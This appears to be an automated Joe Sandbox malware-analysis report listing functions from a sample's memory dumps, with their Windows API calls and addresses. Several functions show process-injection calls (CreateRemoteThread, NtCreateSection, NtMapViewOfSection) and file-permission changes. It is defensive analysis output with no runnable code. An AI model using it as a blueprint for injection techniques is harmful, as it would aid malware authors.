Function 0040D38E, Relevance: 6.1, APIs: 4, Instructions: 97

APIs

Part of subcall function 0040CF97: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040CFBF
Part of subcall function 0040CF97: ReadFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 0040CFE2
Part of subcall function 0040CF97: ReadFile.KERNEL32(00000000,?,00000200,?,?), ref: 0040D035
Part of subcall function 0040CF97: CloseHandle.KERNEL32(00000000), ref: 0040D043
Part of subcall function 0040CF97: Sleep.KERNEL32(000003E8,?,00000000), ref: 0040D064

Sleep.KERNEL32(000927C0), ref: 0040D3C0

Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000008,00000029,00000000,76E6C426,00000000), ref: 0040D0F6
Part of subcall function 0040D076: HeapAlloc.KERNEL32(00000000), ref: 0040D0FD
Part of subcall function 0040D076: GetCapture.USER32 ref: 0040D10F
Part of subcall function 0040D076: WSAStartup.WS2_32(00000201,?), ref: 0040D147
Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040D1F5
Part of subcall function 0040D076: HeapAlloc.KERNEL32(00000000), ref: 0040D1FC
Part of subcall function 0040D076: GetCurrentThreadId.KERNEL32 ref: 0040D20E
Part of subcall function 0040D076: wsprintfA.USER32 ref: 0040D241
Part of subcall function 0040D076: Sleep.KERNEL32(-0000EA60,00000000,?,00000000,00000000), ref: 0040D2A1
Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D2CF
Part of subcall function 0040D076: HeapFree.KERNEL32(00000000), ref: 0040D2D6
Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D310
Part of subcall function 0040D076: HeapFree.KERNEL32(00000000), ref: 0040D317
Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D326
Part of subcall function 0040D076: HeapFree.KERNEL32(00000000), ref: 0040D32D
Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000000,0040D3F2), ref: 0040D33E
Part of subcall function 0040D076: HeapFree.KERNEL32(00000000), ref: 0040D345

Part of subcall function 0040DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
Part of subcall function 0040DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
Part of subcall function 0040DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
Part of subcall function 0040DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
Part of subcall function 0040DD0B: CloseHandle.KERNEL32(00000000), ref: 0040DD9C
Part of subcall function 0040DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
Part of subcall function 0040DD0B: HeapFree.KERNEL32(00000000), ref: 0040DDB0

Part of subcall function 0040D8BA: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0040D8EA
Part of subcall function 0040D8BA: SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0040D920
Part of subcall function 0040D8BA: LocalAlloc.KERNEL32(00000040,00000014), ref: 0040D92A
Part of subcall function 0040D8BA: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0040D934
Part of subcall function 0040D8BA: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0040D941
Part of subcall function 0040D8BA: SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0040D94B
Part of subcall function 0040D8BA: FreeSid.ADVAPI32(00000000), ref: 0040D95A
Part of subcall function 0040D8BA: LocalFree.KERNEL32(00000000), ref: 0040D96F
Part of subcall function 0040D8BA: LocalFree.KERNEL32(00000000), ref: 0040D976

CreateThread.KERNEL32(00000000,00000000,0040D354,00000000,00000000,00000000), ref: 0040D47C
CloseHandle.KERNEL32(00000000), ref: 0040D483

Part of subcall function 0040482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0040318E,00000000,?,00000000,0040D266,?,00000001,00000000,76E6C570,?,?,0040D266), ref: 00404845
Part of subcall function 0040482B: HeapFree.KERNEL32(00000000,?,0040D266), ref: 0040484C

Sleep.KERNEL32(-0000EA60), ref: 0040D4B0

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004254C3, Relevance: 6.1, APIs: 4, Instructions: 92

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,004255D8,?,?,?), ref: 0042550D

Part of subcall function 0042BB4E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00424C51,00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE), ref: 0042BB93

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,00000001,00000000), ref: 00425577
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00425585
__freea.LIBCMT ref: 0042558F

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00421381, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetLastError.KERNEL32(?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00421385

Part of subcall function 0042123F: TlsGetValue.KERNEL32(00000000,00421398,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00421248
Part of subcall function 0042123F: DecodePointer.KERNEL32(?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 0042125A
Part of subcall function 0042123F: TlsSetValue.KERNEL32(00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00421269

SetLastError.KERNEL32(00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 004213EF

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

DecodePointer.KERNEL32(00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 004213C1
GetCurrentThreadId.KERNEL32(?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 004213D7

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3

Part of subcall function 004212CD: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00435780,00000008,004213D5,00000000,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000), ref: 004212DE
Part of subcall function 004212CD: InterlockedIncrement.KERNEL32(?), ref: 0042131F

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00421381, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetLastError.KERNEL32(00000000,?,00423589,00424BAC,?,0042085F,00000003), ref: 00421385

Part of subcall function 0042123F: TlsGetValue.KERNEL32(?,00421398,?,0042085F,00000003), ref: 00421248
Part of subcall function 0042123F: RtlDecodePointer.NTDLL ref: 0042125A
Part of subcall function 0042123F: TlsSetValue.KERNEL32(00000000,?,0042085F,00000003), ref: 00421269

SetLastError.KERNEL32(00000000,?,0042085F,00000003), ref: 004213EF

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

RtlDecodePointer.NTDLL(00000000), ref: 004213C1
GetCurrentThreadId.KERNEL32(?,0042085F,00000003), ref: 004213D7

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

Part of subcall function 004212CD: GetModuleHandleW.KERNEL32(00434124,00435780,00000008,004213D5,00000000,00000000,?,0042085F,00000003), ref: 004212DE
Part of subcall function 004212CD: InterlockedIncrement.KERNEL32(004327E0), ref: 0042131F

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00421543, Relevance: 6.0, APIs: 4, Instructions: 34

APIs

TlsGetValue.KERNEL32 ref: 00421564
TlsGetValue.KERNEL32 ref: 00421576
DecodePointer.KERNEL32(00000000), ref: 0042158C

Part of subcall function 00421414: InterlockedDecrement.KERNEL32(?), ref: 004214B2

TlsSetValue.KERNEL32(00000007,00000000), ref: 004215A9

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0040E967, Relevance: 6.0, APIs: 4, Instructions: 28

APIs

GetCurrentProcess.KERNEL32(00020008,0040E84F), ref: 0040E984
OpenProcessToken.ADVAPI32(00000000), ref: 0040E98B
GetTokenInformation.ADVAPI32(0040E84F,00000014,00000000,00000004,?), ref: 0040E9A4
CloseHandle.KERNEL32(0040E84F), ref: 0040E9AD

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004302F5, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242

APIs

Part of subcall function 0041F3C3: __getptd.LIBCMT ref: 0041F3D6

__aulldvrm.INT64 ref: 0043041D

Part of subcall function 00426951: __isleadbyte_l.LIBCMT ref: 00426995
Part of subcall function 00426951: ___crtGetStringTypeA.LIBCMT ref: 004269D6

Strings

$, xrefs: 0043034B
0, xrefs: 004303F2

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 004302F5, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242

APIs

Part of subcall function 0041F3C3: __getptd.LIBCMT ref: 0041F3D6

__aulldvrm.INT64 ref: 0043041D

Part of subcall function 00426951: __isleadbyte_l.LIBCMT ref: 00426995
Part of subcall function 00426951: ___crtGetStringTypeA.LIBCMT ref: 004269D6

Strings

0, xrefs: 004303F2
$, xrefs: 0043034B

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00409240, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 159

APIs

GetVersion.KERNEL32(?,00000000,00000000), ref: 00409263

Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F9F1
Part of subcall function 0040F995: HeapAlloc.KERNEL32(00000000), ref: 0040F9F4
Part of subcall function 0040F995: GetShellWindow.USER32 ref: 0040FA08
Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040FA67
Part of subcall function 0040F995: HeapAlloc.KERNEL32(00000000), ref: 0040FA6A
Part of subcall function 0040F995: GetCapture.USER32 ref: 0040FA7E
Part of subcall function 0040F995: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040FAAF
Part of subcall function 0040F995: GetProcAddress.KERNEL32(00000000), ref: 0040FAB6
Part of subcall function 0040F995: NtCreateSection.NTDLL(00000000,000F001F,00000018,?,00000040,08000000,00000000), ref: 0040FAEF
Part of subcall function 0040F995: CloseHandle.KERNEL32(00000000), ref: 0040FB4A
Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FB59
Part of subcall function 0040F995: HeapFree.KERNEL32(00000000), ref: 0040FB62
Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000000,?), ref: 0040FB69
Part of subcall function 0040F995: HeapFree.KERNEL32(00000000), ref: 0040FB6C

Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00408C1A
Part of subcall function 00408BB1: HeapAlloc.KERNEL32(00000000), ref: 00408C1D
Part of subcall function 00408BB1: GetShellWindow.USER32 ref: 00408C38
Part of subcall function 00408BB1: GetModuleHandleA.KERNEL32(00000000), ref: 00408C5E
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408C74
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408C77
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00408CB0
Part of subcall function 00408BB1: HeapAlloc.KERNEL32(00000000), ref: 00408CB3
Part of subcall function 00408BB1: GetMessagePos.USER32 ref: 00408CD1
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408D1C
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408D25
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408D2A
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408D2D
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00408D70
Part of subcall function 00408BB1: HeapAlloc.KERNEL32(00000000), ref: 00408D73
Part of subcall function 00408BB1: GetCaretBlinkTime.USER32 ref: 00408D8A
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408DDA
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408DE3
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408DEE
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408DF1
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408DF6
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408DF9
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00408E3E
Part of subcall function 00408BB1: HeapAlloc.KERNEL32(00000000), ref: 00408E41
Part of subcall function 00408BB1: GetCapture.USER32 ref: 00408E55
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408EA0
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408EA9
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408EB0
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408EB3
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408EBA
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408EC5
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408ECE
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408ED5
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408ED8
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408EDF
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408EE2
Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408EE7
Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408EEA

Part of subcall function 00409408: GetVersion.KERNEL32(?,s@,?), ref: 00409414
Part of subcall function 00409408: CloseHandle.KERNEL32(00404E1D), ref: 00409433
Part of subcall function 00409408: GetProcessHeap.KERNEL32 ref: 004094B2
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 004094B5
Part of subcall function 00409408: GetShellWindow.USER32 ref: 004094D4
Part of subcall function 00409408: GetProcessHeap.KERNEL32(?,?,00000008,0000000C), ref: 00409535
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000,?,?,00000008,0000000C), ref: 00409538
Part of subcall function 00409408: GetMessagePos.USER32 ref: 0040955D
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000008,0000002D,?,?,00000008,0000000C), ref: 004095E8
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000,?,?,00000008,0000000C), ref: 004095EF
Part of subcall function 00409408: GetShellWindow.USER32 ref: 0040960B
Part of subcall function 00409408: GetProcessHeap.KERNEL32 ref: 004096D0
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 004096D3
Part of subcall function 00409408: GetClipboardViewer.USER32 ref: 004096F2
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00409768
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 0040976B
Part of subcall function 00409408: GetCursor.USER32 ref: 00409784
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004097D2
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 004097D5
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,?), ref: 004097DF
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 004097E2
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004097FF
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 00409806
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000008,0000000C), ref: 0040981A
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 0040981D
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,?,?,?,00000008,0000000C), ref: 00409827
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 0040982A
Part of subcall function 00409408: GetProcessHeap.KERNEL32 ref: 004098CD
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 004098D4
Part of subcall function 00409408: GetShellWindow.USER32 ref: 004098F1
Part of subcall function 00409408: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 00409955
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 0040995C
Part of subcall function 00409408: GetKBCodePage.USER32(?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 00409975
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 004099C2
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 004099CF
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 004099D5
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 004099DC
Part of subcall function 00409408: CreateRemoteThread.KERNEL32(00404E19,00000000,00000000,?,?,00000000,00404E25), ref: 00409A5D
Part of subcall function 00409408: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 00409A6F
Part of subcall function 00409408: GetExitCodeThread.KERNEL32(00404E1D,?), ref: 00409A88
Part of subcall function 00409408: GetLastError.KERNEL32 ref: 00409A93
Part of subcall function 00409408: GetProcessHeap.KERNEL32 ref: 00409AC8
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 00409ACF
Part of subcall function 00409408: GetShellWindow.USER32 ref: 00409AEC
Part of subcall function 00409408: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,00000015), ref: 00409B50
Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,00000015), ref: 00409B57
Part of subcall function 00409408: GetKBCodePage.USER32(?,?,?,?,?,?,00000008,00000015), ref: 00409B70
Part of subcall function 00409408: GetModuleHandleA.KERNEL32(?,00000000,?,?,?,?,?,?,00000008,00000015), ref: 00409BA0
Part of subcall function 00409408: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,00000008,00000015), ref: 00409BA7
Part of subcall function 00409408: WaitForSingleObject.KERNEL32(?,00007530), ref: 00409BDD
Part of subcall function 00409408: GetExitCodeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000008,0000000B), ref: 00409BF2
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000008,00000015), ref: 00409C09
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 00409C16
Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,00000015), ref: 00409C1C
Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 00409C23

Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00408F71
Part of subcall function 00408F05: HeapAlloc.KERNEL32(00000000), ref: 00408F74
Part of subcall function 00408F05: GetShellWindow.USER32 ref: 00408F8F
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00408FE5
Part of subcall function 00408F05: HeapAlloc.KERNEL32(00000000), ref: 00408FE8
Part of subcall function 00408F05: GetMessagePos.USER32 ref: 00409006
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409052
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 0040905B
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409060
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409063
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000008,00000018), ref: 004090A9
Part of subcall function 00408F05: HeapAlloc.KERNEL32(00000000), ref: 004090AC
Part of subcall function 00408F05: GetCaretBlinkTime.USER32 ref: 004090C3
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409114
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 0040911D
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409128
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 0040912B
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409130
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409133
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00409178
Part of subcall function 00408F05: HeapAlloc.KERNEL32(00000000), ref: 0040917B
Part of subcall function 00408F05: GetCapture.USER32 ref: 0040918F
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004091DB
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 004091E4
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 004091EB
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 004091EE
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 004091F5
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409200
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409209
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409210
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409213
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 0040921A
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 0040921D
Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409222
Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409225

CloseHandle.KERNEL32(00000000), ref: 004093F9

Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F888
Part of subcall function 0040F859: HeapAlloc.KERNEL32(00000000), ref: 0040F88F
Part of subcall function 0040F859: GetShellWindow.USER32 ref: 0040F8A1
Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040F905
Part of subcall function 0040F859: HeapAlloc.KERNEL32(00000000), ref: 0040F90C
Part of subcall function 0040F859: CloseClipboard.USER32 ref: 0040F920
Part of subcall function 0040F859: LoadLibraryA.KERNEL32(?), ref: 0040F951
Part of subcall function 0040F859: GetProcAddress.KERNEL32(00000000), ref: 0040F958
Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F971
Part of subcall function 0040F859: HeapFree.KERNEL32(00000000), ref: 0040F97E
Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F983
Part of subcall function 0040F859: HeapFree.KERNEL32(00000000), ref: 0040F98A

Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0040F74E
Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F751
Part of subcall function 0040F6F4: GetClipboardSequenceNumber.USER32 ref: 0040F766
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F7B8
Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F7BB
Part of subcall function 0040F6F4: GetShellWindow.USER32 ref: 0040F7CF
Part of subcall function 0040F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0040F800
Part of subcall function 0040F6F4: GetProcAddress.KERNEL32(00000000), ref: 0040F807
Part of subcall function 0040F6F4: NtMapViewOfSection.NTDLL(?,?,4B475735,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 0040F827
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F835
Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F842
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F847
Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F84E

Strings

s@, xrefs: 004093B8

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00426CB9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116

APIs

Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641

_strcspn.LIBCMT ref: 00426D23
_strcspn.LIBCMT ref: 00426DB5

Strings

_.,, xrefs: 00426D1A, 00426DAF

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
